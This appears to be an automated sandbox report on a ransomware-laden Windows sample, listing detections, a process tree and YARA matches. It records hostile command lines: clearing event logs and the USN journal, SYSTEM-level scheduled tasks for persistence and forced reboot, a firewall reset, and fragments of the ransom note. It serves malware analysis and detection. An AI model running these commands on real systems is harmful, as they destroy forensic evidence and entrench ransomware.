Edit tour

Windows Analysis Report
irH9zMhZub.exe

Overview

General Information

Sample Name:	irH9zMhZub.exe
Analysis ID:	712619
MD5:	7d8f0e539e50eb545d094c50aab0ea9e
SHA1:	9368da690ace5328abc4461cd8322d78c1fdc290
SHA256:	f9c5420c0f039a178f5495ecfb657f8da383624e0cf7f02c645fbdfa95e2e8b9
Tags:	CerberexeRansomware
Infos:

Detection

Babuk, Cerber, DeriaLock, InfinityLock, Mimikatz, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Detected unpacking (overwrites its own PE header)

Yara detected DeriaLock Ransomware

Yara detected Babuk Ransomware

System process connects to network (likely due to code injection or exploit)

Sigma detected: Execute DLL with spoofed extension

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Cerber ransomware

Antivirus / Scanner detection for submitted sample

Yara detected Mimikatz

Multi AV Scanner detection for dropped file

Yara detected InfinityLock Ransomware

Found evasive API chain (may stop execution after checking mutex)

Uses netsh to modify the Windows network and firewall settings

Found Tor onion address

Deletes keys related to Windows Defender

Deletes keys which are related to windows safe boot (disables safe mode boot)

Clears the journal log

Machine Learning detection for sample

Clears the windows event log

Contains functionalty to change the wallpaper

Connects to many different private IPs (likely to spread or exploit)

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality to create processes via WMI

Contains functionality to enumerate network shares of other devices

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Modifies the windows firewall

Connects to many different private IPs via SMB (likely to spread or exploit)

Found decision node followed by non-executed suspicious APIs

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Found evasive API chain checking for process token information

Creates a start menu entry (Start Menu\Programs\Startup)

Checks for available system drives (often done to infect USB drives)

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Found potential string decryption / allocating functions

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Enables security privileges

Uses taskkill to terminate processes

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Classification

Process Tree

System is w10x64

irH9zMhZub.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\irH9zMhZub.exe" MD5: 7D8F0E539E50EB545D094C50AAB0EA9E)

Endermanch@BadRabbit.exe (PID: 5660 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)

conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5364 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 4112 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 1408 cmdline: schtasks /Delete /F /TN rhaegal MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 2364 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2224 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1446829312 && exit" MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 5128 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2404 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:08:00 MD5: 15FF7D8324231381BAD48A052F85DF04)

5753.tmp (PID: 4948 cmdline: "C:\Windows\5753.tmp" \\.\pipe\{BA7DC5E0-29E5-4FCA-A986-C2C71FD14928} MD5: 347AC3B6B791054DE3E5720A7144A977)

conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4152 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

wevtutil.exe (PID: 4996 cmdline: wevtutil cl Setup MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)

wevtutil.exe (PID: 60 cmdline: wevtutil cl System MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)

wevtutil.exe (PID: 5468 cmdline: wevtutil cl Security MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)

wevtutil.exe (PID: 2372 cmdline: wevtutil cl Application MD5: 27C3944EC1E3CAD62641ECBCEB107EE9)

fsutil.exe (PID: 7632 cmdline: fsutil usn deletejournal /D C: MD5: 140A43A2237D7D7497D4E0568B518B71)

cmd.exe (PID: 3500 cmdline: /c schtasks /Delete /F /TN drogon MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2564 cmdline: schtasks /Delete /F /TN drogon MD5: 15FF7D8324231381BAD48A052F85DF04)

Endermanch@BadRabbit.exe (PID: 5388 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 2212 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

Endermanch@Birele.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)

taskkill.exe (PID: 5484 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@BadRabbit.exe (PID: 3140 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)

conhost.exe (PID: 2392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@Birele.exe (PID: 4668 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)

taskkill.exe (PID: 4500 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@Cerber5.exe (PID: 5148 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)

netsh.exe (PID: 3584 cmdline: C:\Windows\system32\netsh.exe advfirewall set allprofiles state on MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 4812 cmdline: C:\Windows\system32\netsh.exe advfirewall reset MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@BadRabbit.exe (PID: 5460 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)

conhost.exe (PID: 4688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 2852 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

Endermanch@Birele.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)

taskkill.exe (PID: 3664 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@Cerber5.exe (PID: 3592 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)

Endermanch@DeriaLock.exe (PID: 3576 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)

Endermanch@BadRabbit.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)

conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@Birele.exe (PID: 272 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe" MD5: 41789C704A0EECFDD0048B4B4193E752)

taskkill.exe (PID: 3868 cmdline: taskkill /F /IM explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Endermanch@Cerber5.exe (PID: 5456 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe" MD5: FE1BC60A95B2C2D77CD5D232296A7FA4)

Endermanch@DeriaLock.exe (PID: 5728 cmdline: "C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe" MD5: 0A7B70EFBA0AA93D4BC0857B87AC2FCB)

svchost.exe (PID: 5492 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5524 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5480 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

cmd.exe (PID: 5420 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1446829312 && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 5356 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1268 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 7664 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	JoeSecurity_infinitylock	Yara detected InfinityLock Ransomware	Joe Security
C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	MALWARE_Win_InfinityLock	Detects InfinityLock ransomware	ditekSHen	0x2c145:$s3: GenerateHWID 0x2c2c3:$s4: CreateKey 0x2c1b6:$d1: ProgrammFiles 0x2c1ad:$d2: OneDrive 0x2c184:$d3: ProgrammsX86 0x2c1a4:$d4: UserDirs 0x2c1dd:$d5: B_Drive 0x2e834:$pdb1: F:\DESKTOP!\ChkDsk\ChkDsk\obj\ 0x2e846:$pdb2: \ChkDsk\obj\Debug\PremiereCrack.pdb
C:\Windows\cscc.dat	INDICATOR_TOOL_ENC_DiskCryptor	Detect DiskCryptor open encryption solution that offers encryption of all disk partitions	ditekSHen	0x2b3d8:$d1: \DosDevices\dcrypt 0x2b488:$d2: $dcsys$_fail_%x 0x2b468:$d3: %s\$DC_TRIM_%x$ 0x2b3b8:$d4: \Device\dcrypt 0x2b420:$d5: %s\$dcsys$
C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	JoeSecurity_DeriaLock	Yara detected DeriaLock Ransomware	Joe Security
C:\Windows\dispci.exe	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST 0x14430:$x4: C:\Windows\cscc.dat 0x1b1bd:$s1: need to do is submit the payment and get the decryption password. 0x1f30d:$s1: need to do is submit the payment and get the decryption password. 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1) 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot 0x146ca:$s6: Files decryption completed 0x145ea:$s7: Disable your anti-virus and anti-malware programs
C:\Windows\dispci.exe	sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93	Bad Rabbit Ransomware	Christiaan Beek	0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00 0x1b1bd:$x2: need to do is submit the payment and get the decryption password. 0x1f30d:$x2: need to do is submit the payment and get the decryption password. 0x1b40a:$s3: If you have already got the password, please enter it below. 0x1f55a:$s3: If you have already got the password, please enter it below. 0x2130c:$s4: dispci.exe 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1) 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot 0x147b8:$s7: Enter password#1: 0x14676:$s8: Enter password#2: 0x14430:$s9: C:\Windows\cscc.dat 0x14940:$s10: schtasks /Delete /F /TN %ws 0x1b448:$s11: Password#1: 0x1f598:$s11: Password#1: 0x14398:$s12: \AppData 0x14650:$s13: Readme.txt 0x14752:$s14: Disk decryption completed 0x146ca:$s15: Files decryption completed 0x212b4:$s16: http://diskcryptor.net/ 0x1b235:$s17: Your personal installation key#1:
C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	cerber3	Cerber3	pekeinfo	0x48e9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
C:\Users\user\AppData\Local\Temp\Fantom.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\Fantom.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 EC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000028.00000000.314208666.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
00000028.00000000.312282421.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93	Bad Rabbit Ransomware	Christiaan Beek	0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00 0x1a205:$x2: need to do is submit the payment and get the decryption password. 0x1e355:$x2: need to do is submit the payment and get the decryption password. 0x1a452:$s3: If you have already got the password, please enter it below. 0x1e5a2:$s3: If you have already got the password, please enter it below. 0x20354:$s4: dispci.exe 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1) 0x1a587:$s6: Run DECRYPT app at your desktop after system boot 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot 0x13800:$s7: Enter password#1: 0x136be:$s8: Enter password#2: 0x13478:$s9: C:\Windows\cscc.dat 0x13988:$s10: schtasks /Delete /F /TN %ws 0x1a490:$s11: Password#1: 0x1e5e0:$s11: Password#1: 0x133e0:$s12: \AppData 0x13698:$s13: Readme.txt 0x1379a:$s14: Disk decryption completed 0x13712:$s15: Files decryption completed 0x202fc:$s16: http://diskcryptor.net/ 0x1a27d:$s17: Your personal installation key#1:
0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
00000013.00000002.412053021.0000000001720000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000002C.00000000.315363439.0000000000DC6000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_DeriaLock	Yara detected DeriaLock Ransomware	Joe Security
00000028.00000002.329104231.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
0000001B.00000000.303576856.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
0000001B.00000000.302953795.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
00000028.00000000.312879365.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
00000028.00000000.311585156.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
00000013.00000002.459335598.0000000005E70000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
00000013.00000000.299020841.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
00000013.00000000.301994770.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
00000013.00000000.299998392.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmp	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
00000013.00000000.303477710.0000000000448000.00000020.00000001.01000000.0000000A.sdmp	cerber3	Cerber3	pekeinfo	0x1a9f:$a: 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85
0000001B.00000000.303401011.00007FF7CEF2E000.00000008.00000001.01000000.0000000B.sdmp	mimikatz	mimikatz	Benjamin DELPY (gentilkiwi)	0x10a8:$exe_x64_1: 33 FF 41 89 37 4C 8B F3 45 85 C0 74 0x10b8:$exe_x64_1: 33 FF 45 89 37 48 8B F3 45 85 C9 74 0x1068:$exe_x64_2: 4C 8B DF 49 C1 E3 04 48 8B CB 4C 03 D8
00000028.00000002.331419258.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp	Cerber	Cerber Payload	kevoreilly	0x1ac8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
Process Memory Space: rundll32.exe PID: 5364	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: rundll32.exe PID: 5364	fe_cpe_ms17_010_ransomware	probable petya ransomware using eternalblue, wmic, psexec	ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick	0x2352:$dmap01: \\.\PhysicalDrive 0x124ac:$dmap04: TERMSRV 0x463b:$dmap05: \admin$ 0x720c:$dmap05: \admin$ 0x7c4c:$dmap05: \admin$ 0x878b:$dmap05: \admin$ 0x87a9:$dmap05: \admin$ 0x87c6:$dmap05: \admin$ 0x93e0:$dmap05: \admin$ 0xc469:$dmap05: \admin$ 0xcead:$dmap05: \admin$ 0xd691:$dmap05: \admin$ 0xd6a6:$dmap05: \admin$ 0x1119b:$dmap05: \admin$ 0x1263c:$dmap05: \admin$ 0x12648:$dmap05: \admin$ 0x164ac:$dmap05: \admin$ 0x164cc:$dmap05: \admin$ 0x164eb:$dmap05: \admin$ 0x166e9:$dmap05: \admin$ 0x166fe:$dmap05: \admin$
Process Memory Space: rundll32.exe PID: 2212	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: Endermanch@Cerber5.exe PID: 5148	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
Process Memory Space: Endermanch@DeriaLock.exe PID: 3576	JoeSecurity_DeriaLock	Yara detected DeriaLock Ransomware	Joe Security
Process Memory Space: rundll32.exe PID: 2852	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
32.2.Endermanch@BadRabbit.exe.1320000.1.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
49.0.Endermanch@BadRabbit.exe.1320000.0.unpack	BadRabbit_Gen	Detects BadRabbit Ransomware	Florian Roth	0x6114:$x3: C:\Windows\infpub.dat 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
40.2.Endermanch@Cerber5.exe.4df0000.2.unpack	Cerber	Cerber Payload	kevoreilly	0xec8:$code1: 33 C0 66 89 45 84 8D 7D 86 AB AB AB AB AB 6A 0F 66 AB 8D 45 84 6A 0B 50 E8 B4 42 00 00
